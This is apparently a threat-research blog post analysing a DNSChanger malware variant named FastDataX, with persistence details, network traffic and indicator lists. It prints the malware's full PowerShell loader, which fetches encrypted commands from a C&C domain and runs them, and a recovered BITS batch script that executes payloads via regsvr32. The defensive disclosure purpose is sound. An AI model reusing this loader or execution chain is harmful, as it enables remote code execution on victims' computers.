Watch Out: The FastDataX campaign – DNSChanger is Back!

Watch Out: The FastDataX campaign – DNSChanger is Back!

Verint’s Cyber Research team has recently discovered evidence of a new campaign for a variant of the infamous DNSChanger Trojan, which, as its name implies, alters a computer’s DNS entries to point toward rogue name servers. The new Trojan was identified through alerts in a Verint Threat Protection System (TPS) installation, which were triggered by its behavioral C&C detection engine. The alerts triggered an automatic investigation in TPS, which identified other suspicious domains and combined all related alerts into one security incident.

Using forensic tools, Verint’s Cyber Research determined that this DNSChanger campaign utilizes familiar characteristics and patterns, such as PowerShell scripts, BITS Jobs and communication patterns used in previous campaigns. Click To TweetFurther analysis uncovered the initial infection point, related payloads and additional domains and concluded they are all part of the new campaign. Interestingly, the campaign makes use of new domains that were registered on March 2017 and are yet to be linked to DNSChanger.

Previous DNSChanger campaigns have been tightly connected with Adware and PUAs as a source of (re)-infection. The campaign utilizes a file named “fastdatax.exe” and initial analysis suggests this may be the DNSChanger. This file creates the BITS tasks, which make the DNSChanger network connections to download and execute payloads (see below).

We named the current campaign “FastDataX” since it revolves around a software with this name and communicates with FastDataX[dictionary word].info web sites.

The following Blog is a detailed account of the Verint research team’s findings and includes:

  • Initial detection of the malware via behavioral C&C alerts
  • Forensic analysis of infection point
  • Persistence methods
  • Related network traffic analysis
  • List of IOCs

INITIAL DETECTION

The Verint Threat Protection System (TPS) issued several behavioral C&C alerts pertaining to several fastdatax*.info domains and started an automatic investigation:

Verint Threat Protection System – C&C (Behavioral Analysis) Alert

Verint Threat Protection System – Link Analysis

 

INFECTION POINT

Forensic analysis of the alerted endpoint revealed the following scenario: A user voluntarily downloaded a malicious file from some file-sharing website, after the user double-clicked the file, an .xht file (XHTML, an HTML file which is defined as an XML application) was dropped and executed.

The .xht file included a link to

http[://]ab0cd85de032858b2efc-98b168bd21c640d1dbb3a0f567ddbbfe.r14.cf1.rackcdn.com/kOcQm1koU2hOmFWMxOJbQo0m9p/lpx.html

Also, displayed several images hosted by imgur.com, which are instructions on how to save and execute the downloaded software:

Instructions on how to save and execute the downloaded software:

 

The execution of the file also triggered a chain of events which lead to the installation of several software bundles which can be categorized as PUP/Adware. Among those were YeaDesktop, PCCleanPlus, X-Madbench and FastDataX. Out of these adware, FastDataX was looking most curious and insidious

As with previous campaigns (which abused applications like Optimizer Pro and System Healer), these Adware are the second stage of infection for DNSChanger.

PERSISTENCE

Several persistence mechanisms were utilized by the installed PUP/Adware:

  • Registry ‘run’ key – abused by such Adware as YeaDesktop
  • Scheduled tasks with the application name, abused by Adware like ‘Pangody’ & X- Madbench. For example and scheduled task named “X-Madbench”, which executes rundll32 “C:\Program Files\X-Madbench\X-Madbench.dll”,SceNcISYvR 
  • Scheduled tasks with random names and GUID that execute DLLs via rundll32. For example, scheduled task named “E3605470-291B-44EB-8648-745EE356599A”
  • Scheduled tasks with random names that executes PowerShell (see more details below)
  • BITS jobs (see more details below)

PowerShell

FastDataX.exe maintains persistence via a scheduled task named “FastDataX”, and an additional scheduled task is created in a GUID structure (7D0A0D47-057F-040C-7E11-7E0D7905117D). This task is comprised of the following PowerShell :

$ErrorActionPreference=”stop”;
$sc=”SilentlyContinue”;
$WarningPreference=$sc;
$ProgressPreference=$sc;
$VerbosePreference=$sc;
$DebugPreference=$sc;
/************************************************************\
registry update – position windows out of bounds of screen
\************************************************************/
function RegistryUpdate($p){
$n=”WindowPosition”;
try{
New-Item -Path $p|Out-Null;
}
catch{
}
try{
New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664|
Out-Null;
}
catch{
try{
Set-ItemProperty -Path $p -Name $n -Value 201329664|Out-Null;
}
catch{
}
}
}
RegistryUpdate(“HKCU:\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe”);
RegistryUpdate(“HKCU:\Console\%SystemRoot%_System32_svchost.exe”);
RegistryUpdate(“HKCU:\Console\taskeng.exe”);
/* this is the URL with the GET params */
$surl=”http[://]fastdataxster[.]info/u/?a=2tpeW5PNy/** snipped by VERINT to
protect customer privacy */”;
/* end of url with params */
$stsk=”{
7D0A0D47-057F-040C-7E11-7E0D7905117D
}
“;
$prid=”FastDataX”;
$inid=”NRMNUMSW”;
try{
/* check for PS version – if 1 exit) */
if($PSVersionTable.PSVersion.Major -lt 2){
break;
;
}
$v=[System.Environment]::OSVersion.Version;
/* checks if Windows env is early then 8, exit if it is */
if($v.Major -eq 5){
if(($v.Minor -lt 2) -AND ((Get-WmiObject Win32_OperatingSystem).
ServicePackMajorVersion -lt 2)){
break;
;
}
}
/* checking for permissioned user – if not administrator – exit */
if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]
::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] “Administrator”)){
break;
}
/************************************************************\
* GET Request, download further instructions, using a “legit” UA (not really)
\************************************************************/
function downloadCmd($url){
$rq=New-Object System.Net.WebClient;
$rq.UseDefaultCredentials=$true;
$rq.Headers.Add(“user-agent” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)”);
return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url));
}
/*************************************************************************\
* Decryption scheme (second byte in stream used as XOR + Offest, then AND 0xFF
\************************************************************************/
function decryptCmd($rawdata){
$bt=[Convert]::FromBase64String($rawdata);
$ext=$bt[0];
$key=$bt[1] -bxor 170;
for($i=2;
$i -lt $bt.Length;
$i++){
$bt[$i]=($bt[$i] -bxor (($key + $i) -band 255));
}
return(New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream(
(New-Object IO.MemoryStream($bt 2 ($bt.Length-$ext))) [IO.Compression.CompressionMode]
::Decompress)))
.ReadToEnd();
}
$sc=decryptCmd(downloadCmd($surl));
Invoke-Expression -command “$sc”;
}
catch{};
exit 0;

This PS script combines an outgoing GET message to fastdataxster[.]info and a decrypted body. The decrypted response holds execution data and thus can expand the malware’s abilities upon will.

The structure of this PowerShell is similar to a previously analyzed DNSChanger PS script. It should be noted that the domain embedded inside the script is new and was not previously linked to the DNSChanger campaign.

BITS job:

FastdataX also uses BITS (Background Intelligent Transfer Service) jobs which generate HTTP Head messages to fastdataxcast[.]info and fastdataxfire[.]info. We could not find online information regarding these domains or any association between them and the current malware campaign.

That being said, the two types of BITS job are identical to previously analyzed BITS jobs.

The following BITS job is an example of a task recovered from the BITS logs of the infected endpoint and it is used in order to download, install and perform clean-up of the malware payloads.

BITS job to create batch

"cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\4806190a-7c75-
1\x.bat" & 
echo bitsadmin /complete 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-
1\x.bat" & 
echo bitsadmin /cancel 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-
1\x.bat" & 
echo if exist "C:\ProgramData\4806190a-7c75-1\4806190a-7c75-1.d" goto q >> 
"C:\ProgramData\4806190a-7c75-1\x.bat" & 
for /f %i in ('dir /a:-d /b /w "C:\ProgramData\4806190a-7c75-1\*.tmp"') do (echo start
/b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-1\%i"
>> "C:\ProgramData\4806190a-7c75-1\x.bat")) > nul & 
echo :q >> "C:\ProgramData\4806190a-7c75-1\x.bat" & 
echo start /b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-
1\4806190a-7c75-1 d" >> "C:\ProgramData\4806190a-7c75-1\x.bat" & 
echo del "C:\ProgramData\4806190a-7c75-1\x.bat" ^& exit >> "C:\ProgramData\4806190a-
7c75-1\x.bat" & 
"C:\ProgramData\4806190a-7c75-1\x.bat""./.S-1-5-21-3582221642-4087043515-2770962101-
1001

Changes to the DNS settings

DNSChanger has been using one of three methods in order to change the DNS settings:

  • Modifying the ‘NameServer’ & ‘DHCPNameServer’ settings in the Windows registry, thus replacing the configured servers with new DNS servers (by calling the DhcpNotifyConfigChange (API)
  • Changing the router’s DNS configuration (as analysed by Proofpoint)
  • Editing the local HOSTS file

The ‘FastDatax’ variant of DNSChanger is using the third method. It adds multiple domains (see list in the IOC section of this article) that are used to download additional payloads

NETWORK ANALYSIS

An analysis with Verint’s TPS Network Forensics component, which enables a detailed network analysis, revealed evidence of the malware’s C&C communication:

An analysis with Verint's TPS Network Forensics component which enables to perform a detailed network analysis, revealed evidence of the malware's C&C communication:
This enabled the Cyber research team to distinguish between three types of sessions with similar structures:

1. HEAD request sessions to “fastdataxfier[.]info” and “fastdataxcast[.]info”. As discussed above, these are generated by FastDataX BITS jobs:

2. GET request sessions to “fastdataxster[.]info” that were generated by the above mentioned PowerShell script:

3. POST request sessions to “fastdataxient[.]info“, “fastdataxium[.]info” and “fastdataxify[.]info

It should be noted that all the FastDataX domains were resulted to the 81.171.14.67 IP address, which was used in previous DNSChanger campaign.

As can be seen from the above images, the user agents used by the malware are different from each other and are spoofed. Noticeable example for that is a “bug” in generating a user-agent, where the word “user agent” appears twice:

It has a similar traffic structure that was observed in the past and referred to DNSChanger, where parameters contained system information and DNS configuration information.

Below is a list of identified IOCs relating to the FastDataX campaign.

IOCs

Domains/IPs:

Seen on 21-22.06.2017 in Verint TPS
81.171.14.67
fastdataxium[.]info
fastdataxcast[.]info
fastdataxfire[.]info
fastdataxster[.]info
fastdataxient[.]info
fastdataxify[.]info

Related domains:

DomainPassive DNS replication date
fastdataxate.info2017-07-07
fastdataxsage.info2017-07-06
fastdataxigy.info2017-07-05
fastdataxopoly.info2017-07-05
fastdataxace.info2017-06-30
fastdataxcube.info2017-06-27
fastdataxdigita.info2017-06-27
fastdataxmage.info2017-06-27
fastdataxmancer.info2017-06-27
fastdataxmaven.info2017-06-27
fastdataxpro.info2017-06-27
fastdataxrunner.info2017-06-27
fastdataxstar.info2017-06-27
fastdataxster.info2017-06-27
fastdataxity.info2017-06-27
fastdataxality.info2017-06-27
fastdataxfeed.info2017-06-25
fastdataxcast.info2017-06-21
fastdataxfire.info2017-06-21
fastdataxient.info2017-06-21
fastdataxify.info2017-06-21
fastdataxium.info2017-06-21
fastdataxio.info2017-06-08

Domains found inside the HOSTS file

agent.wizztrakys[.]com
bestoffersfortoday[.]com
bigpicturepop[.]com
bongadoom[.]com
burningcube[.]ru
csdimonetize[.]com
dl.azalee[.]site
dl.smashdl[.]com
downloadmyhost[.]com
dwl0.wizzlabs[.]com
dwl1.wizzlabs[.]com
getthefilenow[.]com
healthydownload[.]com
installpixel[.]com
internalcampaigntargets[.]com
leading2download[.]com
mess1.wizzmonetize[.]com
titiaredh[.]com
wepcanalyticsystem[.]com
wepcdisplaysystem[.]com
wepcmainsystem[.]com
wizzcaster[.]com

Hashes:

MD5SHA256Description
fdfebd2ba002b18eac079a1ac21ef70d16ea0a1c090e8084cbee7d5b9eb55d07d7db09eb58ee93fe096c9b624d9dae64Payload downloader (.xht)
a11e1be8f9418f4e075b4c9794bc75f8a779534bd4110602ef630a0afe8031f931d7fa4f7ef84b3e449d915a60d1b0eaPangody.dll
8c03a0be7aadec4506fc52c4a507e320f1eda24967aafc09d82418d8e92a189221bdfe52befa7cbbdb6d8642a8ffd5b8X-Madbench.dll

Author: Verint Research Lab